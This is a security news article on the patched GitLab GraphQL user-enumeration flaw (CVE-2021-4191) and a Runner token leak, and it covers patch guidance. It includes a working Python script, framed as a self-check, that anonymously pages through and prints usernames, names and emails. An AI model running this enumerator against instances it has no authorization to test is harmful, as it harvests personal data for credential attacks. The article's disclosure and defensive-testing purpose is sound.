Vulnerability fixed in GitLab that allowed access to Runner tokens

A few days ago GitLab disclosed in a blog post that researchers had revealed details of a now-patched security vulnerability in GitLab, the open-source DevOps software, which could allow a remote, unauthenticated attacker to obtain user-related information.

The main vulnerability, already registered as CVE-2021-4191, is a medium-severity flaw affecting all versions of GitLab Community Edition and Enterprise Edition starting from 13.0, and all versions starting from 14.4 and prior to 14.8.

Jake Baines, a senior security researcher at Rapid7, is credited with discovering and reporting the flaw. Following responsible disclosure on November 18, 2021, GitLab shipped the fix as part of the critical security releases 14.8.2, 14.7.4 and 14.6.5. The same releases also close a separate flaw that could allow an unauthorized user to exfiltrate GitLab Runner registration tokens; GitLab Runner is the agent that executes project code in the continuous integration system.

"The vulnerability is the result of a missing authentication check when executing certain GitLab GraphQL API queries," Baines said in a report published on Thursday. "A remote, unauthenticated attacker can use this vulnerability to harvest registered GitLab usernames, names and email addresses."

In addition, it is noted that if you use Kubernetes executors, you must update the Helm chart values with the new registration token.

For self-managed instances that are not on version 14.6 or later, GitLab has posted patches that can be applied to mitigate the Runner registration token disclosure via the quick actions vulnerability. These patches should be considered temporary: any GitLab instance should be upgraded to a patched version, 14.8.2, 14.7.4 or 14.6.5, as soon as possible.

Successful exploitation of the API leak could allow malicious actors to enumerate and compile a list of legitimate usernames belonging to a target, which could then be used as a stepping stone for brute-force attacks, including password guessing, password spraying and credential stuffing.

"The leaked information also allows an attacker to create a new wordlist based on GitLab installations, not only from gitlab.com but also from the other 50,000 GitLab instances reachable from the Internet."
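The missing-authentication condition Baines describes can be checked against your own instance. The script below is an added example written for this article, not Rapid7's exploit and not GitLab code: it builds the kind of anonymous GraphQL `users` query the advisory refers to and classifies the answer. The `/api/graphql` path and the `users`/`nodes`/`pageInfo` field shape follow GitLab's public GraphQL schema; the query text, the function names and the sample response are this example's own, and the sample response is constructed, not captured from any instance.

```python
"""Self-check for unauthenticated user enumeration through the GitLab GraphQL API.

Added example for this article, not GitLab's or Rapid7's code. Assumptions:
- the endpoint is the standard /api/graphql path of a GitLab instance;
- the query shape (users -> nodes -> username/name/publicEmail) follows the
  public GitLab GraphQL schema;
- the sample response at the bottom is constructed, not captured anywhere.
"""
import json
import sys
import urllib.request

GRAPHQL_PATH = "/api/graphql"

# Request exactly the fields the advisory says leak: usernames, names, emails.
USERS_QUERY = """
query EnumerateUsers($after: String) {
  users(first: 100, after: $after) {
    pageInfo { hasNextPage endCursor }
    nodes { username name publicEmail }
  }
}
"""


def build_request(base_url, after=None):
    """Build an anonymous POST to /api/graphql.

    No PRIVATE-TOKEN or Authorization header is set on purpose: the question is
    what an unauthenticated client gets back.
    """
    payload = json.dumps({"query": USERS_QUERY, "variables": {"after": after}}).encode()
    return urllib.request.Request(
        base_url.rstrip("/") + GRAPHQL_PATH,
        data=payload,
        headers={"Content-Type": "application/json", "Accept": "application/json"},
        method="POST",
    )


def assess(status, body):
    """Classify one GraphQL response obtained without credentials.

    Returns {"leaks": bool, "users": list, "reason": str}. User records handed
    to an anonymous client are the condition the article describes; errors or
    an empty/null users field mean the instance withheld the data.
    """
    users = (body.get("data") or {}).get("users") or {}
    nodes = users.get("nodes") or []
    records = [n for n in nodes if isinstance(n, dict) and n.get("username")]
    if status == 200 and records:
        return {"leaks": True, "users": records,
                "reason": "%d user record(s) returned to an anonymous client" % len(records)}
    if body.get("errors"):
        messages = "; ".join(e.get("message", "") for e in body["errors"])
        return {"leaks": False, "users": [], "reason": "GraphQL errors: " + messages}
    return {"leaks": False, "users": [], "reason": "HTTP %d, no user nodes in response" % status}


def enumerate_all(fetch, base_url):
    """Follow cursor pagination until the server stops returning records.

    `fetch` is any callable taking a Request and returning (status, body_dict),
    so the walk can be exercised offline with a stub.
    """
    after, found = None, []
    while True:
        status, body = fetch(build_request(base_url, after))
        verdict = assess(status, body)
        if not verdict["leaks"]:
            break
        found.extend(verdict["users"])
        page = body["data"]["users"].get("pageInfo") or {}
        if not page.get("hasNextPage"):
            break
        after = page.get("endCursor")
    return found


def http_fetch(req):
    """Real network fetch; used only when a URL is given on the command line."""
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.status, json.loads(resp.read().decode())


# Constructed sample (not from any real instance), shaped like the schema above.
SAMPLE_LEAKY_RESPONSE = {
    "data": {"users": {
        "pageInfo": {"hasNextPage": False, "endCursor": None},
        "nodes": [
            {"username": "alice", "name": "Alice Example", "publicEmail": "alice@example.test"},
            {"username": "bob", "name": "Bob Example", "publicEmail": None},
        ],
    }}
}

if __name__ == "__main__":
    if len(sys.argv) == 2:
        found = enumerate_all(http_fetch, sys.argv[1])
        print("%d user record(s) obtained without credentials" % len(found))
        for u in found:
            print(u["username"], u.get("name"), u.get("publicEmail"))
    else:
        print(assess(200, SAMPLE_LEAKY_RESPONSE)["reason"])
```

Run it with the base URL of a self-managed instance you are authorized to test; with no argument it only evaluates the constructed sample. A non-empty result for an anonymous client on a private instance is the leak; a patched instance answers with GraphQL errors or a null/empty `users` field, and both are reported as "no leak". Note that on an instance whose user profiles are public anyway (gitlab.com, for example) the same data is reachable by design, so the check is only meaningful against instances that restrict visibility.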

Users who maintain their own GitLab installation are advised to install the update or apply the patch as soon as possible. The issue was fixed by restricting access to quick action commands to users with Write permission only.

After installing the update or the "token-prefix" patches, previously created Runner registration tokens for groups and projects are reset and the affected runners must be re-registered with the new tokens.

In addition to the critical issue, the newly released versions also include fixes for six lower-severity vulnerabilities:

  • DoS attack via the issue submission system: an issue in GitLab CE/EE affecting all versions starting from 8.15. It was possible to trigger a DoS by using the math feature with a specific formula in issue comments.
  • Addition of other users to groups by an unprivileged user: affects all versions prior to 14.3.6, all versions starting from 14.4 prior to 14.4.4, and all versions starting from 14.5 prior to 14.5.2. Under certain conditions, the GitLab REST API could allow unprivileged users to add other users to groups, even though this is not possible through the web UI.
  • Misleading users via spoofed snippet content: allows an unauthorized actor to create snippets with misleading content, which could trick unsuspecting users into executing arbitrary commands.
  • Leakage of environment variables via the "sendmail" delivery method: improper input validation in all versions of GitLab CE/EE that use sendmail to send e-mail allowed an unauthorized actor to steal environment variables through specially crafted e-mail addresses.
  • Determining user existence via the GraphQL API: private GitLab instances with restricted sign-up may be vulnerable to user enumeration by unauthenticated users through the GraphQL API.
  • Password leak when mirroring repositories over SSH in pull mode.

Finally, if you are interested in knowing more about it, you can check the details at the following link.
